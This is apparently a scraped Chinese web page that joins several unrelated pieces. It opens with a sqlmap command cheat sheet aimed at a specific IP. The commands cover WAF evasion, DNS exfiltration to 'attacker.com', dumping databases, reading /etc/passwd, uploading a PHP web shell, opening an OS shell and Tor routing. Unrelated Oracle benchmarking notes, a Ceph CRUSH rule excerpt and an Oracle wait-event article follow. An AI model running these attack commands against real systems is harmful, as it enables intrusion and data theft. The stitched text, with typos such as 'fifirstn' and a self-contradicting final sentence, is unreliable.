—invalid-logical—no-cast:将sqlmap取出的数据转换为字符串,并用空格替换NULL结果,在老版本时需要开启此开关。python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —no-cast—no-escape:为了逃逸服务器端对sqlmap的检测,默认使用char()编码替换字符串。本参数将关闭此功能。比如 select ‘foo’ —> select cahr(102) + char(111) + char(111)python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —no-escape—prefix:添加前缀python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —prefix “‘)’”—suffix :添加后缀python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —suffix “AND (‘abc’=’abc”—tamper:使用脚本,绕过IPS、WAF等python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —tamper=”tamper/between.py,tamper/randomcase.py”—dns-domain:攻击者控制了DNS服务器,可以提高取出数据的效率python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —dns-domain attacker.com—second-order:在一个页面注入的结果,从另外一个页面提现出来python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —second-order “http://1.1.1.1/b.php“八.查看基本信息-f :扫描时加入数据库指纹检测python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ -f-b :查看数据库的版本信息python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ -b九.查看数据信息—users :查询所有的数据库账号python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —users—dbs :查询所有数据库python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —dbs—schema :查询源数据库(包含定义数据的数据)python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —schema-a :查询当前user、当前数据库、主机名、当前user是否是最大权限管理员、数据库账号等python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ -a-D dvwa:指定数据库python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ -D database_name—current-user :查询当前数据库用户python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —current-user—current-db :查询当前数据库python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —current-db—hostname :查看服务器的主机名python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —hostname—Privileges -U username :查询username的权限python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —Privileges -U username—roles :查询角色python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —roles—tables :查看所有的表python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —tables-T :指定表python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ -T table_name—columns :查看所有的字段python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —columns-C :指定字段python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ -C column_name—count :计数,查看有多少条数据python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —count—exclude-sysdbs :排除系统库python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —exclude-sysdbs—dump :查看数据python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —dump—start 3 :查看第三条python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —start 3—end 4 :查看第四条python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —end 4—sql-query “select * from users” :执行语句python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —sql-query “select * from users”—common-columns :暴力破解字段,应用于两种情况:①无权限读取数据。②mysql<5.0 ,没有infomation_schema库python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —common-columns—common-tables :暴力破解表python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —common-tables十.其他参数—batch :自动选是python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —batch—charset:强制字符编码python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —charset=GBK—crawl:爬站深度python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —crawl=3—csv-del:指定csv文件的分隔符python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —csv-del=”;”—flush-session :清空sessionpython sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —flush-session—force-ssl :强制使用HTTPSpython sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —force-ssl—fresh-queries :重新检测,不使用本地已查询的数据python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —fresh-queries—hex :以16进制的形式编码dump出来的数据python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —hex—parse-errors :分析和显示数据库内建报错信息python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —parse-errors—answer :回答python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —answer=”extending=N”—check-waf :检测WAF/IPS/IDSpython sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —check-waf—hpp :绕过WAF/IPS/IDSpython sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —hpp—identify-waf :彻底检测WAF/IPS/IDSpython sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —identify-waf—mobile :模拟智能手机设备python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —mobile—purge-output :清除output文件夹python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —purge-output—smart :当有大量检测目标时,只选择基于错误的检测结果python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —smart十一.高级注入参数—file-read:文件系统访问python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —file-read=”/etc/passwd”—file-write、—file-dest :写文件到目标位置python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —file-write=”shell.php” —file-dest “/tmp/shell.php”—sql-shell :进入交互式mysql窗口python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —sql-shell—os-shell :进入命令行窗口python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —os-shell使用Tor代理sqlmap.py -u http://navisec.it/123.asp?id=1 —tor -tor-type=SOCKS5 —tor-port=9050 —check-tor
swingbench 的模式stress test不用造数据,直接测试
oracle订阅专栏这个测试案例的优点是不用造数据,但要创建用户和表空间create user soe identified by soe;create tablespace soe datafile ‘/home/oracle/dingjia/guangxi/soe.dbf’ size 100M autoextend on maxsize unlimited;grant connect,resource to soe;alter user soe quota unlimited on soe ;alter user soe default tablespace soe;./charbench -c ../configs/Stress_Test.xml -u soe -p soe -r stresstest1.xml -stats full -dbap dingjia -dbau "sys as sysdba" -uc 4 -rt 0:01 -cs //localhost/guangxi测试50个用户的时候,tps值最高53000.
《存储漫谈:Ceph原理与实践-样章》——第一篇 理论篇——第2章 Ceph 架构——2.2 Ceph 数据寻址——2.2.2 CRUSH 算法因子(3)
该场景下,Placement Rules 定义如下。rule replicated_ruleset {
ruleset 0 //ruleset 的编号 ID
type replicated // 类型 replicated 或者 erasure code
min_size 1 // 副本数最小值
max_size 10 // 副本数最大值
step take root // 选择一个 root bucket,做下一步的输入
step choose fifirstn 1 type row // 选择一个 row,同一排
step choose fifirstn 3 type cabinet // 选择 3 个 cabinet,3 副本分别在不同的 cabinet
step choose fifirstn 1 type osd // 在上一步输出的3个cabinet中,分别选择一个OSD
step emit
}根据上面的 Cluster Map 和 Placement Rules 定义,选择算法的执行过程如下。1)选中 root bucket 作为下一个步骤的输入;2)从 root 类型的 bucket 中选择 1 个 row 类的子 bucket,其选择的算法在 root 的定义中设置,一般设置为 straw 算法;3)从上一步的输出 row 中,选择 3 个 cabinet,其选择的算法在 row 中定义;4)从上一步输出的 3 个 cabinet 中,分别选出一个 OSD,并输出。最终实现效果为可选择出 3 个 OSD 设备,分布在 1 个 row 上的 3 个 cabinet 中。(2)主副本分布在 SSD 上,其他副本分布在 HDD 上。如图 2-4 所示的 Cluster Map 定义了 2 个 root 类型的 bucket,一个是名为 SSD 的root 类型的 bucket,其 OSD 存储介质都是 SSD 固态硬盘,它包含 2 个 host,每个 host上的存储设备都是 SSD 固态硬盘;另一个是名为 HDD 的 root 类型的 bucket,其 OSD 存储介质都是 HDD 硬盘,它有 2 个 host,每个 host 上的设备都是 HDD 硬盘。图 2-4 Ceph 数据分布示意(Cluster Map)该场景下,Placement Rules 定义如下。rule ssd-primary {
ruleset 0
type replicated
min_size 1
max_size 10
step take ssd // 选择 SSD 这个 root bucket 为输入
step chooseleaf fifirstn 1 type host // 选择一个 host,
并递归选择叶子节点 OSD
step emit // 输出结果
step take hdd // 选择 HDD 这个 root bucket 为输入
step chooseleaf fifirstn -1 type host // 选择总副本数减一个 host
// 并分别递归选择一个叶子节点 OSD
step emit // 输出结果
}根据上面的 Cluster Map 和 Placement Rules 定义,选择算法的执行过程如下。1)首先 take 操作选择 ssd 为 root 类型的 bucket ;2)在 SSD 的 root 中先选择一个 host,然后以该 host 为输入,递归至叶子节点,选择一个 OSD 设备;3)输出选择的设备,也就是 SSD 设备;4)选择 HDD 作为 root 的输入;5)选择 2 个 host(副本数减 1,默认 3 副本),并分别递归选择一个 OSD 设备,最终选出 2 个 HDD 设备;6)输出最终结果。最终实现效果为输出 3 个设备,一个是 SSD 类型的磁盘,另外两个是 HDD 磁盘。通过上述规则,就可以把 PG 的主副本存储在 SSD 类型的 OSD 上,其他副本分布在 HDD 类型的磁盘上。
log file sync 和 log file parallel write等待事件的区别和联系
log file parallel write 和log file sync这两个等待事件关系密切,很多人对这两个等待事件有一些误解,我们先来看看Oracle官方文档的解释:log file parallel writeWriting redo records to the redo log files from the log buffer.Wait Time: Time it takes for the I/Os to complete. Even though redo records are written in parallel, the parallel write is not completeuntil the last I/O is on disk.log file syncWhen a user session commits, the session’s redo information must be flushed to the redo logfile. The user session willpost the LGWR to write the log buffer to the redo log file. When the LGWR has finished writing, it will post the user session.Wait Time: The wait time includes the writing of the log buffer and the post.这两个等待事件的关系可以用下面这个图说明:这两者之间的关系是:log file sync 是前端等待事件,是从用户进程角度看的。log file parallel write 是后端等待事件 ,是从LGWR进程角度看的。log file sync中包含log file parallel write 。第一个误区,很多人以为log file sync 这个等待事件反映了写redo的效率,实际上这个事件和cpu的性能很有关系,Kevin Closson有一篇精彩的论文来说明这个问题,虽然是十几年前写的,但仍然很有借鉴价值。他在这篇论文里面举例一个noise process占用了大量的cpu资源,造成log file sync 性能下降,有兴趣的同学可以看看这篇论文。第二个误区,很多人以为这两个 log file sync减去log file parallel write就是cpu的时间,我在网上看到了太多这样的论断,其实我们仔细看看oracle官方文档的定义,log file sync是要从写log buffer算起的,其实oracle用的是group commit 来提高写redo的效率,也叫piggyback commit,这个不能由用户设置,如果log file parallel write效率低的适合有很多时间是用于等待的,特别是12C之前的版本,只有一个LGWR进程,等待的时间长不能算CPU效率低,实际还是写redo效率低造成的!我自己的一个测试案例是log file parallel write低到10ms时,log file parallel write下降到53ms。